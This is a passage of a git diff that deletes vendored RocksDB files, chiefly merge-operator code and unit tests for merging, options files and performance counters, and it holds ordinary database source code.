-  AddKeyVal("a", 28, kTypeMerge, test::EncodeInt(1U));
-  AddKeyVal("a", 27, kTypeMerge, test::EncodeInt(3U));
-  AddKeyVal("a", 26, kTypeMerge, test::EncodeInt(5U));  // Filtered
-  AddKeyVal("a", 25, kTypeMerge, test::EncodeInt(5U));  // Filtered
-  AddKeyVal("b", 24, kTypeValue, test::EncodeInt(5U));  // next user key
-
-  ASSERT_OK(Run(15, true));
-  ASSERT_TRUE(iter_->Valid());
-  MergeOutputIterator merge_output_iter(merge_helper_.get());
-  merge_output_iter.SeekToFirst();
-  // sequence number is 29 here, because the first merge operand got filtered
-  // out
-  ASSERT_EQ(test::KeyStr("a", 29, kTypeValue),
-            merge_output_iter.key().ToString());
-  ASSERT_EQ(test::EncodeInt(6U), merge_output_iter.value().ToString());
-  merge_output_iter.Next();
-  ASSERT_FALSE(merge_output_iter.Valid());
-
-  // make sure that we're passing user keys into the filter
-  ASSERT_EQ("a", filter_->last_merge_operand_key());
-}
-
-// Make sure that merge operands are not filtered out if there's a snapshot
-// pointing at them
-TEST_F(MergeHelperTest, DontFilterMergeOperandsBeforeSnapshotTest) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-  filter_.reset(new test::FilterNumber(5U));
-
-  AddKeyVal("a", 31, kTypeMerge, test::EncodeInt(5U));
-  AddKeyVal("a", 30, kTypeMerge, test::EncodeInt(5U));
-  AddKeyVal("a", 29, kTypeMerge, test::EncodeInt(2U));
-  AddKeyVal("a", 28, kTypeMerge, test::EncodeInt(1U));
-  AddKeyVal("a", 27, kTypeMerge, test::EncodeInt(3U));
-  AddKeyVal("a", 26, kTypeMerge, test::EncodeInt(5U));
-  AddKeyVal("a", 25, kTypeMerge, test::EncodeInt(5U));
-  AddKeyVal("b", 24, kTypeValue, test::EncodeInt(5U));
-
-  ASSERT_OK(Run(15, true, 32));
-  ASSERT_TRUE(iter_->Valid());
-  MergeOutputIterator merge_output_iter(merge_helper_.get());
-  merge_output_iter.SeekToFirst();
-  ASSERT_EQ(test::KeyStr("a", 31, kTypeValue),
-            merge_output_iter.key().ToString());
-  ASSERT_EQ(test::EncodeInt(26U), merge_output_iter.value().ToString());
-  merge_output_iter.Next();
-  ASSERT_FALSE(merge_output_iter.Valid());
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/merge_operator.cc b/thirdparty/rocksdb/db/merge_operator.cc
deleted file mode 100644
index 1981e65..0000000
--- a/thirdparty/rocksdb/db/merge_operator.cc
+++ /dev/null
@@ -1,86 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-/**
- * Back-end implementation details specific to the Merge Operator.
- */
-
-#include "rocksdb/merge_operator.h"
-
-namespace rocksdb {
-
-bool MergeOperator::FullMergeV2(const MergeOperationInput& merge_in,
-                                MergeOperationOutput* merge_out) const {
-  // If FullMergeV2 is not implemented, we convert the operand_list to
-  // std::deque<std::string> and pass it to FullMerge
-  std::deque<std::string> operand_list_str;
-  for (auto& op : merge_in.operand_list) {
-    operand_list_str.emplace_back(op.data(), op.size());
-  }
-  return FullMerge(merge_in.key, merge_in.existing_value, operand_list_str,
-                   &merge_out->new_value, merge_in.logger);
-}
-
-// The default implementation of PartialMergeMulti, which invokes
-// PartialMerge multiple times internally and merges two operands at
-// a time.
-bool MergeOperator::PartialMergeMulti(const Slice& key,
-                                      const std::deque<Slice>& operand_list,
-                                      std::string* new_value,
-                                      Logger* logger) const {
-  assert(operand_list.size() >= 2);
-  // Simply loop through the operands
-  Slice temp_slice(operand_list[0]);
-
-  for (size_t i = 1; i < operand_list.size(); ++i) {
-    auto& operand = operand_list[i];
-    std::string temp_value;
-    if (!PartialMerge(key, temp_slice, operand, &temp_value, logger)) {
-      return false;
-    }
-    swap(temp_value, *new_value);
-    temp_slice = Slice(*new_value);
-  }
-
-  // The result will be in *new_value. All merges succeeded.
-  return true;
-}
-
-// Given a "real" merge from the library, call the user's
-// associative merge function one-by-one on each of the operands.
-// NOTE: It is assumed that the client's merge-operator will handle any errors.
-bool AssociativeMergeOperator::FullMergeV2(
-    const MergeOperationInput& merge_in,
-    MergeOperationOutput* merge_out) const {
-  // Simply loop through the operands
-  Slice temp_existing;
-  const Slice* existing_value = merge_in.existing_value;
-  for (const auto& operand : merge_in.operand_list) {
-    std::string temp_value;
-    if (!Merge(merge_in.key, existing_value, operand, &temp_value,
-               merge_in.logger)) {
-      return false;
-    }
-    swap(temp_value, merge_out->new_value);
-    temp_existing = Slice(merge_out->new_value);
-    existing_value = &temp_existing;
-  }
-
-  // The result will be in *new_value. All merges succeeded.
-  return true;
-}
-
-// Call the user defined simple merge on the operands;
-// NOTE: It is assumed that the client's merge-operator will handle any errors.
-bool AssociativeMergeOperator::PartialMerge(
-    const Slice& key,
-    const Slice& left_operand,
-    const Slice& right_operand,
-    std::string* new_value,
-    Logger* logger) const {
-  return Merge(key, &left_operand, right_operand, new_value, logger);
-}
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/merge_test.cc b/thirdparty/rocksdb/db/merge_test.cc
deleted file mode 100644
index b6582b7..0000000
--- a/thirdparty/rocksdb/db/merge_test.cc
+++ /dev/null
@@ -1,517 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include <assert.h>
-#include <memory>
-#include <iostream>
-
-#include "port/stack_trace.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "db/dbformat.h"
-#include "db/db_impl.h"
-#include "db/write_batch_internal.h"
-#include "utilities/merge_operators.h"
-#include "util/testharness.h"
-
-using namespace rocksdb;
-
-namespace {
-size_t num_merge_operator_calls;
-void resetNumMergeOperatorCalls() { num_merge_operator_calls = 0; }
-
-size_t num_partial_merge_calls;
-void resetNumPartialMergeCalls() { num_partial_merge_calls = 0; }
-}
-
-class CountMergeOperator : public AssociativeMergeOperator {
- public:
-  CountMergeOperator() {
-    mergeOperator_ = MergeOperators::CreateUInt64AddOperator();
-  }
-
-  virtual bool Merge(const Slice& key,
-                     const Slice* existing_value,
-                     const Slice& value,
-                     std::string* new_value,
-                     Logger* logger) const override {
-    assert(new_value->empty());
-    ++num_merge_operator_calls;
-    if (existing_value == nullptr) {
-      new_value->assign(value.data(), value.size());
-      return true;
-    }
-
-    return mergeOperator_->PartialMerge(
-        key,
-        *existing_value,
-        value,
-        new_value,
-        logger);
-  }
-
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value,
-                                 Logger* logger) const override {
-    assert(new_value->empty());
-    ++num_partial_merge_calls;
-    return mergeOperator_->PartialMergeMulti(key, operand_list, new_value,
-                                             logger);
-  }
-
-  virtual const char* Name() const override {
-    return "UInt64AddOperator";
-  }
-
- private:
-  std::shared_ptr<MergeOperator> mergeOperator_;
-};
-
-namespace {
-std::shared_ptr<DB> OpenDb(const std::string& dbname, const bool ttl = false,
-                           const size_t max_successive_merges = 0) {
-  DB* db;
-  Options options;
-  options.create_if_missing = true;
-  options.merge_operator = std::make_shared<CountMergeOperator>();
-  options.max_successive_merges = max_successive_merges;
-  Status s;
-  DestroyDB(dbname, Options());
-// DBWithTTL is not supported in ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-  if (ttl) {
-    std::cout << "Opening database with TTL\n";
-    DBWithTTL* db_with_ttl;
-    s = DBWithTTL::Open(options, dbname, &db_with_ttl);
-    db = db_with_ttl;
-  } else {
-    s = DB::Open(options, dbname, &db);
-  }
-#else
-  assert(!ttl);
-  s = DB::Open(options, dbname, &db);
-#endif  // !ROCKSDB_LITE
-  if (!s.ok()) {
-    std::cerr << s.ToString() << std::endl;
-    assert(false);
-  }
-  return std::shared_ptr<DB>(db);
-}
-}  // namespace
-
-// Imagine we are maintaining a set of uint64 counters.
-// Each counter has a distinct name. And we would like
-// to support four high level operations:
-// set, add, get and remove
-// This is a quick implementation without a Merge operation.
-class Counters {
-
- protected:
-  std::shared_ptr<DB> db_;
-
-  WriteOptions put_option_;
-  ReadOptions get_option_;
-  WriteOptions delete_option_;
-
-  uint64_t default_;
-
- public:
-  explicit Counters(std::shared_ptr<DB> db, uint64_t defaultCount = 0)
-      : db_(db),
-        put_option_(),
-        get_option_(),
-        delete_option_(),
-        default_(defaultCount) {
-    assert(db_);
-  }
-
-  virtual ~Counters() {}
-
-  // public interface of Counters.
-  // All four functions return false
-  // if the underlying level db operation failed.
-
-  // mapped to a levedb Put
-  bool set(const std::string& key, uint64_t value) {
-    // just treat the internal rep of int64 as the string
-    char buf[sizeof(value)];
-    EncodeFixed64(buf, value);
-    Slice slice(buf, sizeof(value));
-    auto s = db_->Put(put_option_, key, slice);
-
-    if (s.ok()) {
-      return true;
-    } else {
-      std::cerr << s.ToString() << std::endl;
-      return false;
-    }
-  }
-
-  // mapped to a rocksdb Delete
-  bool remove(const std::string& key) {
-    auto s = db_->Delete(delete_option_, key);
-
-    if (s.ok()) {
-      return true;
-    } else {
-      std::cerr << s.ToString() << std::endl;
-      return false;
-    }
-  }
-
-  // mapped to a rocksdb Get
-  bool get(const std::string& key, uint64_t* value) {
-    std::string str;
-    auto s = db_->Get(get_option_, key, &str);
-
-    if (s.IsNotFound()) {
-      // return default value if not found;
-      *value = default_;
-      return true;
-    } else if (s.ok()) {
-      // deserialization
-      if (str.size() != sizeof(uint64_t)) {
-        std::cerr << "value corruption\n";
-        return false;
-      }
-      *value = DecodeFixed64(&str[0]);
-      return true;
-    } else {
-      std::cerr << s.ToString() << std::endl;
-      return false;
-    }
-  }
-
-  // 'add' is implemented as get -> modify -> set
-  // An alternative is a single merge operation, see MergeBasedCounters
-  virtual bool add(const std::string& key, uint64_t value) {
-    uint64_t base = default_;
-    return get(key, &base) && set(key, base + value);
-  }
-
-
-  // convenience functions for testing
-  void assert_set(const std::string& key, uint64_t value) {
-    assert(set(key, value));
-  }
-
-  void assert_remove(const std::string& key) { assert(remove(key)); }
-
-  uint64_t assert_get(const std::string& key) {
-    uint64_t value = default_;
-    int result = get(key, &value);
-    assert(result);
-    if (result == 0) exit(1); // Disable unused variable warning.
-    return value;
-  }
-
-  void assert_add(const std::string& key, uint64_t value) {
-    int result = add(key, value);
-    assert(result);
-    if (result == 0) exit(1); // Disable unused variable warning.
-  }
-};
-
-// Implement 'add' directly with the new Merge operation
-class MergeBasedCounters : public Counters {
- private:
-  WriteOptions merge_option_; // for merge
-
- public:
-  explicit MergeBasedCounters(std::shared_ptr<DB> db, uint64_t defaultCount = 0)
-      : Counters(db, defaultCount),
-        merge_option_() {
-  }
-
-  // mapped to a rocksdb Merge operation
-  virtual bool add(const std::string& key, uint64_t value) override {
-    char encoded[sizeof(uint64_t)];
-    EncodeFixed64(encoded, value);
-    Slice slice(encoded, sizeof(uint64_t));
-    auto s = db_->Merge(merge_option_, key, slice);
-
-    if (s.ok()) {
-      return true;
-    } else {
-      std::cerr << s.ToString() << std::endl;
-      return false;
-    }
-  }
-};
-
-namespace {
-void dumpDb(DB* db) {
-  auto it = unique_ptr<Iterator>(db->NewIterator(ReadOptions()));
-  for (it->SeekToFirst(); it->Valid(); it->Next()) {
-    uint64_t value = DecodeFixed64(it->value().data());
-    std::cout << it->key().ToString() << ": " << value << std::endl;
-  }
-  assert(it->status().ok());  // Check for any errors found during the scan
-}
-
-void testCounters(Counters& counters, DB* db, bool test_compaction) {
-
-  FlushOptions o;
-  o.wait = true;
-
-  counters.assert_set("a", 1);
-
-  if (test_compaction) db->Flush(o);
-
-  assert(counters.assert_get("a") == 1);
-
-  counters.assert_remove("b");
-
-  // defaut value is 0 if non-existent
-  assert(counters.assert_get("b") == 0);
-
-  counters.assert_add("a", 2);
-
-  if (test_compaction) db->Flush(o);
-
-  // 1+2 = 3
-  assert(counters.assert_get("a")== 3);
-
-  dumpDb(db);
-
-  std::cout << "1\n";
-
-  // 1+...+49 = ?
-  uint64_t sum = 0;
-  for (int i = 1; i < 50; i++) {
-    counters.assert_add("b", i);
-    sum += i;
-  }
-  assert(counters.assert_get("b") == sum);
-
-  std::cout << "2\n";
-  dumpDb(db);
-
-  std::cout << "3\n";
-
-  if (test_compaction) {
-    db->Flush(o);
-
-    std::cout << "Compaction started ...\n";
-    db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    std::cout << "Compaction ended\n";
-
-    dumpDb(db);
-
-    assert(counters.assert_get("a")== 3);
-    assert(counters.assert_get("b") == sum);
-  }
-}
-
-void testSuccessiveMerge(Counters& counters, size_t max_num_merges,
-                         size_t num_merges) {
-
-  counters.assert_remove("z");
-  uint64_t sum = 0;
-
-  for (size_t i = 1; i <= num_merges; ++i) {
-    resetNumMergeOperatorCalls();
-    counters.assert_add("z", i);
-    sum += i;
-
-    if (i % (max_num_merges + 1) == 0) {
-      assert(num_merge_operator_calls == max_num_merges + 1);
-    } else {
-      assert(num_merge_operator_calls == 0);
-    }
-
-    resetNumMergeOperatorCalls();
-    assert(counters.assert_get("z") == sum);
-    assert(num_merge_operator_calls == i % (max_num_merges + 1));
-  }
-}
-
-void testPartialMerge(Counters* counters, DB* db, size_t max_merge,
-                      size_t min_merge, size_t count) {
-  FlushOptions o;
-  o.wait = true;
-
-  // Test case 1: partial merge should be called when the number of merge
-  //              operands exceeds the threshold.
-  uint64_t tmp_sum = 0;
-  resetNumPartialMergeCalls();
-  for (size_t i = 1; i <= count; i++) {
-    counters->assert_add("b", i);
-    tmp_sum += i;
-  }
-  db->Flush(o);
-  db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(tmp_sum, counters->assert_get("b"));
-  if (count > max_merge) {
-    // in this case, FullMerge should be called instead.
-    ASSERT_EQ(num_partial_merge_calls, 0U);
-  } else {
-    // if count >= min_merge, then partial merge should be called once.
-    ASSERT_EQ((count >= min_merge), (num_partial_merge_calls == 1));
-  }
-
-  // Test case 2: partial merge should not be called when a put is found.
-  resetNumPartialMergeCalls();
-  tmp_sum = 0;
-  db->Put(rocksdb::WriteOptions(), "c", "10");
-  for (size_t i = 1; i <= count; i++) {
-    counters->assert_add("c", i);
-    tmp_sum += i;
-  }
-  db->Flush(o);
-  db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(tmp_sum, counters->assert_get("c"));
-  ASSERT_EQ(num_partial_merge_calls, 0U);
-}
-
-void testSingleBatchSuccessiveMerge(DB* db, size_t max_num_merges,
-                                    size_t num_merges) {
-  assert(num_merges > max_num_merges);
-
-  Slice key("BatchSuccessiveMerge");
-  uint64_t merge_value = 1;
-  char buf[sizeof(merge_value)];
-  EncodeFixed64(buf, merge_value);
-  Slice merge_value_slice(buf, sizeof(merge_value));
-
-  // Create the batch
-  WriteBatch batch;
-  for (size_t i = 0; i < num_merges; ++i) {
-    batch.Merge(key, merge_value_slice);
-  }
-
-  // Apply to memtable and count the number of merges
-  resetNumMergeOperatorCalls();
-  {
-    Status s = db->Write(WriteOptions(), &batch);
-    assert(s.ok());
-  }
-  ASSERT_EQ(
-      num_merge_operator_calls,
-      static_cast<size_t>(num_merges - (num_merges % (max_num_merges + 1))));
-
-  // Get the value
-  resetNumMergeOperatorCalls();
-  std::string get_value_str;
-  {
-    Status s = db->Get(ReadOptions(), key, &get_value_str);
-    assert(s.ok());
-  }
-  assert(get_value_str.size() == sizeof(uint64_t));
-  uint64_t get_value = DecodeFixed64(&get_value_str[0]);
-  ASSERT_EQ(get_value, num_merges * merge_value);
-  ASSERT_EQ(num_merge_operator_calls,
-            static_cast<size_t>((num_merges % (max_num_merges + 1))));
-}
-
-void runTest(int argc, const std::string& dbname, const bool use_ttl = false) {
-  bool compact = false;
-  if (argc > 1) {
-    compact = true;
-    std::cout << "Turn on Compaction\n";
-  }
-
-  {
-    auto db = OpenDb(dbname, use_ttl);
-
-    {
-      std::cout << "Test read-modify-write counters... \n";
-      Counters counters(db, 0);
-      testCounters(counters, db.get(), true);
-    }
-
-    {
-      std::cout << "Test merge-based counters... \n";
-      MergeBasedCounters counters(db, 0);
-      testCounters(counters, db.get(), compact);
-    }
-  }
-
-  DestroyDB(dbname, Options());
-
-  {
-    std::cout << "Test merge in memtable... \n";
-    size_t max_merge = 5;
-    auto db = OpenDb(dbname, use_ttl, max_merge);
-    MergeBasedCounters counters(db, 0);
-    testCounters(counters, db.get(), compact);
-    testSuccessiveMerge(counters, max_merge, max_merge * 2);
-    testSingleBatchSuccessiveMerge(db.get(), 5, 7);
-    DestroyDB(dbname, Options());
-  }
-
-  {
-    std::cout << "Test Partial-Merge\n";
-    size_t max_merge = 100;
-    // Min merge is hard-coded to 2.
-    uint32_t min_merge = 2;
-    for (uint32_t count = min_merge - 1; count <= min_merge + 1; count++) {
-      auto db = OpenDb(dbname, use_ttl, max_merge);
-      MergeBasedCounters counters(db, 0);
-      testPartialMerge(&counters, db.get(), max_merge, min_merge, count);
-      DestroyDB(dbname, Options());
-    }
-    {
-      auto db = OpenDb(dbname, use_ttl, max_merge);
-      MergeBasedCounters counters(db, 0);
-      testPartialMerge(&counters, db.get(), max_merge, min_merge,
-                       min_merge * 10);
-      DestroyDB(dbname, Options());
-    }
-  }
-
-  {
-    std::cout << "Test merge-operator not set after reopen\n";
-    {
-      auto db = OpenDb(dbname);
-      MergeBasedCounters counters(db, 0);
-      counters.add("test-key", 1);
-      counters.add("test-key", 1);
-      counters.add("test-key", 1);
-      db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    }
-
-    DB* reopen_db;
-    ASSERT_OK(DB::Open(Options(), dbname, &reopen_db));
-    std::string value;
-    ASSERT_TRUE(!(reopen_db->Get(ReadOptions(), "test-key", &value).ok()));
-    delete reopen_db;
-    DestroyDB(dbname, Options());
-  }
-
-  /* Temporary remove this test
-  {
-    std::cout << "Test merge-operator not set after reopen (recovery case)\n";
-    {
-      auto db = OpenDb(dbname);
-      MergeBasedCounters counters(db, 0);
-      counters.add("test-key", 1);
-      counters.add("test-key", 1);
-      counters.add("test-key", 1);
-    }
-
-    DB* reopen_db;
-    ASSERT_TRUE(DB::Open(Options(), dbname, &reopen_db).IsInvalidArgument());
-  }
-  */
-}
-}  // namespace
-
-int main(int argc, char *argv[]) {
-  //TODO: Make this test like a general rocksdb unit-test
-  rocksdb::port::InstallStackTraceHandler();
-  runTest(argc, test::TmpDir() + "/merge_testdb");
-// DBWithTTL is not supported in ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-  runTest(argc, test::TmpDir() + "/merge_testdbttl", true); // Run test on TTL database
-#endif  // !ROCKSDB_LITE
-  printf("Passed all tests!\n");
-  return 0;
-}
diff --git a/thirdparty/rocksdb/db/options_file_test.cc b/thirdparty/rocksdb/db/options_file_test.cc
deleted file mode 100644
index fc62840..0000000
--- a/thirdparty/rocksdb/db/options_file_test.cc
+++ /dev/null
@@ -1,119 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include <string>
-
-#include "db/db_impl.h"
-#include "db/db_test_util.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-class OptionsFileTest : public testing::Test {
- public:
-  OptionsFileTest() : dbname_(test::TmpDir() + "/options_file_test") {}
-
-  std::string dbname_;
-};
-
-namespace {
-void UpdateOptionsFiles(DB* db,
-                        std::unordered_set<std::string>* filename_history,
-                        int* options_files_count) {
-  std::vector<std::string> filenames;
-  db->GetEnv()->GetChildren(db->GetName(), &filenames);
-  uint64_t number;
-  FileType type;
-  *options_files_count = 0;
-  for (auto filename : filenames) {
-    if (ParseFileName(filename, &number, &type) && type == kOptionsFile) {
-      filename_history->insert(filename);
-      (*options_files_count)++;
-    }
-  }
-}
-
-// Verify whether the current Options Files are the latest ones.
-void VerifyOptionsFileName(
-    DB* db, const std::unordered_set<std::string>& past_filenames) {
-  std::vector<std::string> filenames;
-  std::unordered_set<std::string> current_filenames;
-  db->GetEnv()->GetChildren(db->GetName(), &filenames);
-  uint64_t number;
-  FileType type;
-  for (auto filename : filenames) {
-    if (ParseFileName(filename, &number, &type) && type == kOptionsFile) {
-      current_filenames.insert(filename);
-    }
-  }
-  for (auto past_filename : past_filenames) {
-    if (current_filenames.find(past_filename) != current_filenames.end()) {
-      continue;
-    }
-    for (auto filename : current_filenames) {
-      ASSERT_GT(filename, past_filename);
-    }
-  }
-}
-}  // namespace
-
-TEST_F(OptionsFileTest, NumberOfOptionsFiles) {
-  const int kReopenCount = 20;
-  Options opt;
-  opt.create_if_missing = true;
-  DestroyDB(dbname_, opt);
-  std::unordered_set<std::string> filename_history;
-  DB* db;
-  for (int i = 0; i < kReopenCount; ++i) {
-    ASSERT_OK(DB::Open(opt, dbname_, &db));
-    int num_options_files = 0;
-    UpdateOptionsFiles(db, &filename_history, &num_options_files);
-    ASSERT_GT(num_options_files, 0);
-    ASSERT_LE(num_options_files, 2);
-    // Make sure we always keep the latest option files.
-    VerifyOptionsFileName(db, filename_history);
-    delete db;
-  }
-}
-
-TEST_F(OptionsFileTest, OptionsFileName) {
-  const uint64_t kOptionsFileNum = 12345;
-  uint64_t number;
-  FileType type;
-
-  auto options_file_name = OptionsFileName("", kOptionsFileNum);
-  ASSERT_TRUE(ParseFileName(options_file_name, &number, &type, nullptr));
-  ASSERT_EQ(type, kOptionsFile);
-  ASSERT_EQ(number, kOptionsFileNum);
-
-  const uint64_t kTempOptionsFileNum = 54352;
-  auto temp_options_file_name = TempOptionsFileName("", kTempOptionsFileNum);
-  ASSERT_TRUE(ParseFileName(temp_options_file_name, &number, &type, nullptr));
-  ASSERT_NE(temp_options_file_name.find(kTempFileNameSuffix),
-            std::string::npos);
-  ASSERT_EQ(type, kTempFile);
-  ASSERT_EQ(number, kTempOptionsFileNum);
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-#if !(defined NDEBUG) || !defined(OS_WIN)
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-#else
-  return 0;
-#endif  // !(defined NDEBUG) || !defined(OS_WIN)
-}
-#else
-
-#include <cstdio>
-
-int main(int argc, char** argv) {
-  printf("Skipped as Options file is not supported in RocksDBLite.\n");
-  return 0;
-}
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/perf_context_test.cc b/thirdparty/rocksdb/db/perf_context_test.cc
deleted file mode 100644
index d06843a..0000000
--- a/thirdparty/rocksdb/db/perf_context_test.cc
+++ /dev/null
@@ -1,705 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include <algorithm>
-#include <iostream>
-#include <thread>
-#include <vector>
-
-#include "monitoring/histogram.h"
-#include "monitoring/instrumented_mutex.h"
-#include "monitoring/thread_status_util.h"
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/perf_context.h"
-#include "rocksdb/slice_transform.h"
-#include "util/stop_watch.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "utilities/merge_operators.h"
-
-bool FLAGS_random_key = false;
-bool FLAGS_use_set_based_memetable = false;
-int FLAGS_total_keys = 100;
-int FLAGS_write_buffer_size = 1000000000;
-int FLAGS_max_write_buffer_number = 8;
-int FLAGS_min_write_buffer_number_to_merge = 7;
-bool FLAGS_verbose = false;
-
-// Path to the database on file system
-const std::string kDbName = rocksdb::test::TmpDir() + "/perf_context_test";
-
-namespace rocksdb {
-
-std::shared_ptr<DB> OpenDb(bool read_only = false) {
-    DB* db;
-    Options options;
-    options.create_if_missing = true;
-    options.max_open_files = -1;
-    options.write_buffer_size = FLAGS_write_buffer_size;
-    options.max_write_buffer_number = FLAGS_max_write_buffer_number;
-    options.min_write_buffer_number_to_merge =
-      FLAGS_min_write_buffer_number_to_merge;
-
-    if (FLAGS_use_set_based_memetable) {
-#ifndef ROCKSDB_LITE
-      options.prefix_extractor.reset(rocksdb::NewFixedPrefixTransform(0));
-      options.memtable_factory.reset(NewHashSkipListRepFactory());
-#endif  // ROCKSDB_LITE
-    }
-
-    Status s;
-    if (!read_only) {
-      s = DB::Open(options, kDbName, &db);
-    } else {
-      s = DB::OpenForReadOnly(options, kDbName, &db);
-    }
-    EXPECT_OK(s);
-    return std::shared_ptr<DB>(db);
-}
-
-class PerfContextTest : public testing::Test {};
-
-TEST_F(PerfContextTest, SeekIntoDeletion) {
-  DestroyDB(kDbName, Options());
-  auto db = OpenDb();
-  WriteOptions write_options;
-  ReadOptions read_options;
-
-  for (int i = 0; i < FLAGS_total_keys; ++i) {
-    std::string key = "k" + ToString(i);
-    std::string value = "v" + ToString(i);
-
-    db->Put(write_options, key, value);
-  }
-
-  for (int i = 0; i < FLAGS_total_keys -1 ; ++i) {
-    std::string key = "k" + ToString(i);
-    db->Delete(write_options, key);
-  }
-
-  HistogramImpl hist_get;
-  HistogramImpl hist_get_time;
-  for (int i = 0; i < FLAGS_total_keys - 1; ++i) {
-    std::string key = "k" + ToString(i);
-    std::string value;
-
-    get_perf_context()->Reset();
-    StopWatchNano timer(Env::Default());
-    timer.Start();
-    auto status = db->Get(read_options, key, &value);
-    auto elapsed_nanos = timer.ElapsedNanos();
-    ASSERT_TRUE(status.IsNotFound());
-    hist_get.Add(get_perf_context()->user_key_comparison_count);
-    hist_get_time.Add(elapsed_nanos);
-  }
-
-  if (FLAGS_verbose) {
-    std::cout << "Get user key comparison: \n" << hist_get.ToString()
-              << "Get time: \n" << hist_get_time.ToString();
-  }
-
-  {
-    HistogramImpl hist_seek_to_first;
-    std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-
-    get_perf_context()->Reset();
-    StopWatchNano timer(Env::Default(), true);
-    iter->SeekToFirst();
-    hist_seek_to_first.Add(get_perf_context()->user_key_comparison_count);
-    auto elapsed_nanos = timer.ElapsedNanos();
-
-    if (FLAGS_verbose) {
-      std::cout << "SeekToFirst uesr key comparison: \n"
-                << hist_seek_to_first.ToString()
-                << "ikey skipped: " << get_perf_context()->internal_key_skipped_count
-                << "\n"
-                << "idelete skipped: "
-                << get_perf_context()->internal_delete_skipped_count << "\n"
-                << "elapsed: " << elapsed_nanos << "\n";
-    }
-  }
-
-  HistogramImpl hist_seek;
-  for (int i = 0; i < FLAGS_total_keys; ++i) {
-    std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-    std::string key = "k" + ToString(i);
-
-    get_perf_context()->Reset();
-    StopWatchNano timer(Env::Default(), true);
-    iter->Seek(key);
-    auto elapsed_nanos = timer.ElapsedNanos();
-    hist_seek.Add(get_perf_context()->user_key_comparison_count);
-    if (FLAGS_verbose) {
-      std::cout << "seek cmp: " << get_perf_context()->user_key_comparison_count
-                << " ikey skipped " << get_perf_context()->internal_key_skipped_count
-                << " idelete skipped "
-                << get_perf_context()->internal_delete_skipped_count
-                << " elapsed: " << elapsed_nanos << "ns\n";
-    }
-
-    get_perf_context()->Reset();
-    ASSERT_TRUE(iter->Valid());
-    StopWatchNano timer2(Env::Default(), true);
-    iter->Next();
-    auto elapsed_nanos2 = timer2.ElapsedNanos();
-    if (FLAGS_verbose) {
-      std::cout << "next cmp: " << get_perf_context()->user_key_comparison_count
-                << "elapsed: " << elapsed_nanos2 << "ns\n";
-    }
-  }
-
-  if (FLAGS_verbose) {
-    std::cout << "Seek uesr key comparison: \n" << hist_seek.ToString();
-  }
-}
-
-TEST_F(PerfContextTest, StopWatchNanoOverhead) {
-  // profile the timer cost by itself!
-  const int kTotalIterations = 1000000;
-  std::vector<uint64_t> timings(kTotalIterations);
-
-  StopWatchNano timer(Env::Default(), true);
-  for (auto& timing : timings) {
-    timing = timer.ElapsedNanos(true /* reset */);
-  }
-
-  HistogramImpl histogram;
-  for (const auto timing : timings) {
-    histogram.Add(timing);
-  }
-
-  if (FLAGS_verbose) {
-    std::cout << histogram.ToString();
-  }
-}
-
-TEST_F(PerfContextTest, StopWatchOverhead) {
-  // profile the timer cost by itself!
-  const int kTotalIterations = 1000000;
-  uint64_t elapsed = 0;
-  std::vector<uint64_t> timings(kTotalIterations);
-
-  StopWatch timer(Env::Default(), nullptr, 0, &elapsed);
-  for (auto& timing : timings) {
-    timing = elapsed;
-  }
-
-  HistogramImpl histogram;
-  uint64_t prev_timing = 0;
-  for (const auto timing : timings) {
-    histogram.Add(timing - prev_timing);
-    prev_timing = timing;
-  }
-
-  if (FLAGS_verbose) {
-    std::cout << histogram.ToString();
-  }
-}
-
-void ProfileQueries(bool enabled_time = false) {
-  DestroyDB(kDbName, Options());    // Start this test with a fresh DB
-
-  auto db = OpenDb();
-
-  WriteOptions write_options;
-  ReadOptions read_options;
-
-  HistogramImpl hist_put;
-
-  HistogramImpl hist_get;
-  HistogramImpl hist_get_snapshot;
-  HistogramImpl hist_get_memtable;
-  HistogramImpl hist_get_files;
-  HistogramImpl hist_get_post_process;
-  HistogramImpl hist_num_memtable_checked;
-
-  HistogramImpl hist_mget;
